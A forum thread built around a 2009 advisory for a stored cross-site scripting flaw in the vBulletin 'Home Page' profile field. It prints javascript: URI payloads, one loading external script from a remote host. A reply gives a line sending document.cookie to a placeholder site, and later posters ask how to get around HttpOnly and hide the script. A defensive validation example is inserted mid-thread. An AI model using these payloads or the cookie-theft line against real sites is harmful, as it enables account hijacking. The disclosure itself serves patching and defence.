
Thread: vBulletin 3.8.4 - Cross Site Script Redirection

  1. #1
    MaXe (Founder of InterN0T)

    vBulletin 3.8.4 - Cross Site Script Redirection

    vBulletin - Cross Site Script Redirection


    Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
    Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

    Info: An XSS flaw within the user profile page has recently been discovered.
    This could allow an attacker to carry out an action as a user or obtain
    access to a user's account. To resolve this issue, it has been necessary to
    release a patch level version of the active versions of vBulletin.

    The upgrade process is the same as previous patch level releases - simply
    download the patch from the Members Area, extract the files and upload to
    your webserver, overwriting the existing files. There is no upgrade script
    required.

    As with all security-based releases, we recommend that all customers
    upgrade as soon as possible in order to prevent any potential damage
    resulting from the flaw being exploited.

    Credits: The original finder of the security hole. (Jelsoft?)

    Researched & Disclosed by: MaXe (InterN0T.net)

    References:
    http://www.vbulletin.com/forum/showthread.php?t=319572


    The Advisory
    The "Home Page" field in the user profile was only checking the user input
    for either "www" or the following regular expression written in normal text:
    Any letter from A to Z and/or a number from 0-9 + :// will make the link valid.

    The output in the Home Page field is encoded with most likely htmlspecialchars(),
    however before the patch it did not check if a user would create a link that
    would send an unknowing user to either the data: or javascript URI scheme.

    The only limits in the Home Page field are:
    - 90 character limit
    - Characters will be converted to html entities.
    - We can only use the data or javascript URI scheme.

    This means that we should avoid " since that becomes &quot; .. The other
    characters like < will become &lt; which is %3C which is almost the same.
    Please see how htmlentities() and htmlspecialchars() work in PHP.

    The following scheme input as home page will alert 0:
    javascript://%0adocument.write('<script>alert(0)</script>')

    The following scheme is a Proof of Concept that external Javascript can be loaded:
    javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

    The following URL contains a working Proof of Concept on the Contact Page:
    http://forum.intern0t.net/members/maxe.html (will be removed soon)


    Solution
    Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1


    Conclusion
    vBulletin is generally a safe and secure platform to use for large forums.
    This security hole / exploit is implausible to actually work against people.
    Please see: http://forum.intern0t.net/blogs/maxe...scripting.html for more information!

    Disclosure Information:
    - Unknown date of when the vendor found the security hole.
    - Vendor released patch on the 7th October 2009.
    - Security hole researched and disclosed on 8th October 2009.


    All of the best,
    MaXe
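
Added example, not part of MaXe's post and not vBulletin's patch code: the "www or letters/digits + ://" check the advisory describes, next to a scheme allowlist that rejects `javascript:` and `data:` links before they are rendered. The function names and the exact legacy regex are assumptions reconstructed from the advisory's wording.

```javascript
// Added example. Function names and the exact legacy regex are assumptions
// reconstructed from the advisory's prose, not vBulletin source.

// Pre-patch style check as described: "www", or letters/digits followed by "://".
function legacyLooksLikeLink(input) {
  return /^www/i.test(input) || /^[a-z0-9]+:\/\//i.test(input);
}

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);
const MAX_LEN = 90; // field limit stated in the advisory

// Returns a normalized http(s) URL, or null if the value must be rejected.
function validateHomePage(input) {
  if (typeof input !== 'string') return null;
  let candidate = input.trim();
  if (candidate.length === 0 || candidate.length > MAX_LEN) return null;
  // Bare "www.example.com" gets an explicit scheme instead of being trusted as-is.
  if (/^www\./i.test(candidate)) candidate = 'http://' + candidate;
  let url;
  try {
    // The WHATWG parser lowercases the scheme and drops embedded tabs/newlines,
    // so "JaVaScRiPt:" and "java\tscript:" are judged as the browser would see them.
    url = new URL(candidate);
  } catch {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol) || !url.hostname) return null;
  return url.href;
}

// Entity-encoding is still required for the attribute and text contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderHomePageLink(input) {
  const href = validateHomePage(input);
  if (href === null) return ''; // render nothing rather than an unsafe link
  const safe = escapeHtml(href);
  return `<a href="${safe}" rel="nofollow noopener">${safe}</a>`;
}

// The alert(0) string quoted in the advisory, used here as a test input.
const POC = "javascript://%0adocument.write('<script>alert(0)</script>')";
console.log(legacyLooksLikeLink(POC), validateHomePage(POC));
```

Encoding the output alone does not help here because the link never needs to break out of the `href` attribute; the scheme has to be checked before the value is stored or rendered.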


  2. #2

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    O_O shweet find! lol

    /pwn going around everywhere
    "BackTrack is the fastest way to go from boot to remote root." - H.D. Moore

  3. #3

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    so ?
    how to hack vbulletin?? :D
    -= newbie permanent was here =-
    visit my blog @ http://zerofreedom.wordpress.com

  4. #4

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    Read the post. The version of vBulletin is vulnerable to XSS.
    Read up on XSS. ;)

  5. #5

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    what we can do with XSS ?
    just cookie stealer or else?
    -= newbie permanent was here =-
    visit my blog @ http://zerofreedom.wordpress.com

  6. #6

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    cookie stealing and session hijacking are the most dangerous ones!

    but there are more! like coding an XSS worm, or making a DDoS with persistent XSS!

    also there are some powerful tools like BeEF.

    google it ;)
    I love InterN0T

  7. #7

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    I was checking this bug and even if we use a js file with a code like
    window.location="http://yourpage.com/bob.php?q="+document.cookie;
    it will only send bblastvisit=value1; bblastactivity=value2
    because the bbsessionhash cookie is sent by vBulletin as HttpOnly. We can't access it from the client side (tested with FF 3.6.4 and IE 6.0)

  8. #8
    MaXe (Founder of InterN0T)

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    Quote, originally posted by Neo139:
    I was checking this bug and even if we use a js file with a code like
    window.location="http://yourpage.com/bob.php?q="+document.cookie;
    it will only send bblastvisit=value1; bblastactivity=value2
    because the bbsessionhash cookie is sent by vBulletin as HttpOnly. We can't access it from the client side (tested with FF 3.6.4 and IE 6.0)

    That doesn't necessarily mean that you cannot hack a user though

    Thanks for the information though :)


  9. #9

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    Quote, originally posted by MaXe:
    That doesn't necessarily mean that you cannot hack a user though

    Thanks for the information though :)

    what can we do? give me ideas =P

    it also works in vBulletin® Version 3.7.5

  10. #10

    Re: vBulletin 3.8.4 - Cross Site Script Redirection

    Yes, a hint would be nice =) I have the same problem =/

    EDIT: I found a solution :) Just need to hide the javascript somehow =/
